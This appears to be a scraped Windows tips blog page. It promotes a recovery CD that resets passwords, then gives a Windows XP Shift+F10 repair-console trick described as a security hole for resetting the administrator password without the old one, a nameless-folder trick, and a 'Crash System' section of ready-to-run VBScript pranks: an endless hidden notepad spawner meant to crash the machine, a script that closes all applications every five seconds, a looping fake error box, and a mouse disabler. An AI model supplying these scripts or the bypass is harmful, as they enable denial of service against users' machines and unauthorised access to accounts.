EBCD is a bootable CD, intended for system recovery in the case of software or hardware faults. It is able to create backup copies of normally working system and restore system to saved state. It contains the best system software ever created, properly compiled and configured for the maximum efficient use.

EBCD will be very useful when you need to:

· Copy/move files (with long names, not necessary in CP437 encoding) from/to the disk but OS which can handle them (windows, Linux...) cannot boot. In particular, you may create a backup copy of normally installed and configured Windows and later restore Windows from such backup copy. So, in the case of fault OS itself and all software and its settings can be restored in 5-10 minutes.

· Perform emergency boot of Windows NT / 2000 / XP. When the loader of this OS on the hard disk is damaged or misconfigured, you are able to load OS using another, standalone loader from this CD.

· Recover master boot record of HDD. This allows to boot OS after incorrect uninstallation of custom loader (LILO, for example), which made all OS on your PC not bootable.

· Delete, move, copy to file (image) and re-create partition from file. Image transfer over network is also supported: so you may configure one PC and then make contents of hard disks of other PCs same as contents of the hard disk of the first one.

· Change password of any user, including administrator of Windows NT/2000/XP OS. You do not need to know the old password.

· Recover deleted file, even file re-deleted from Windows Recycle Bin, and, in contrast, wipe single file or a whole disk so that it will be impossible to recover it in any way.

· Recover data from accidentally formatted disk. Sometimes it helps to recover data from the disk, damaged by a virus.

· Recover data from a floppy disk, which is not readable by OS. Format 3.5" disk for 1.7 Mb size.

Also the disk includes full set of external DOS commands, console versions of the most popular archivers/compressors.

Moreover, emergency boot CD includes minimal Linux distribution (Rescue Linux distribution) which may be very useful to a professional user.

Download links:  EBCD Pro distribution (18mb)

Option #2

Lets say, worst happened – its past 11pm, you are still at work, accidentally forgot admin password and ALL ERD tools don’t work, since the pc you are working on have non-standard disk controller. What to do???

Luckily for us, Microsoft left loophole, big enough to do the task relatively easy:

1. Place in windows XP CD and start your computer (it’s assumed here that your XP CD is bootable – as it should be - and that you have your bios set to boot from CD)

2. Keep your eye on the screen messages for booting to your cd usually it will be “Press any key to boot from cd”

3. Begin windows Repair process.

4. During the reboot, do not make the mistake of “pressing any key” to boot from the CD again!

5. Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.

From here you can run any windows command and you’ll have full administrator access. To reset password you can use ether of two ways:

1) Run NUSRMGR.CPL to get graphical interface

2) Run Compmgmt.msc to get Computer Management console. From there use Local User and Groups->User
Read More »

Create files and folders without any name.

Create files and folders without any name.

Just follow the following steps:
1.Select any file or folder.
2.Right click on it, press rename or simply press F2.
3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad.

Note: Type the numbers 0160 from the numpad, that is, the numbers present on the right side of the keyboard. Don’t type the numbers which are present on top of the character keys.

4.Press Enter and the nameless file or folder will be created.

Reason: The file or folder that seems nameless is actually named with a single space.

But what if you want to create another nameless file or folder in the same directory ?

For this you will have to rename the file with 2 spaces. Just follow these steps below:

1.Select file, press F2.
2.Hold alt key and type 0160 from the numpad.
3.Release the alt key. Now without doing anything else, again hold alt key and press 0160.
4.Press enter and you will have second nameless file in the same directory.
5.Repeat step 3 to create as many nameless files or folders in the same directory.

(we’ve had a problem with deleting these folders, to do so, start your computer in safe mode and delete it from there.)
Read More »

Crash System

Crash System

1]Crash System
Open notepad type the following and save it as anyname.vbs
============================================================
set ws=CreateObject("wscript.shell")
do
ws.run "notepad",0
loop
============================================================
This program will infinitely open notepad in hidden mode causing your
system to crash...!
the value "0" in the third line specifies the mode in which the application
should run here it is hidden mode.






2]Close applications automatically within 5 seconds
Open notepad and type the following:-
╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦
set ws=CreateObject("wscript.shell")
do
ws.sendkeys "%{F4}"
wscript.sleep 5000
loop
╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦


This Script Automatically Close any opened Applications Within 5 Seconds You Can Also Specify a Greater Time Value By Just Changing The Line
wscript.sleep 5000 For Example if u Want to Close within 10 seconds Then Change The Value 0f of “5000” to “10000” it is actually time value in milliseconds.




3]Display a fake message box!
open notepad and type the following and save it with anyname.vbs :-
╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦
do
msgbox "System Error : 423"
loop
╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦




4]Disable The Mouse
Open Notepad and Type The Following :-
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
set ws=Createobject("wscript.shell")
for i=1 to 4
ws.run "WISPTIS.EXE",0
next
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

save it with anyname.vbs
This script will Disable your mouse temporarily............
to make it normal just restart your system........
be careful it's so dangers.
Read More »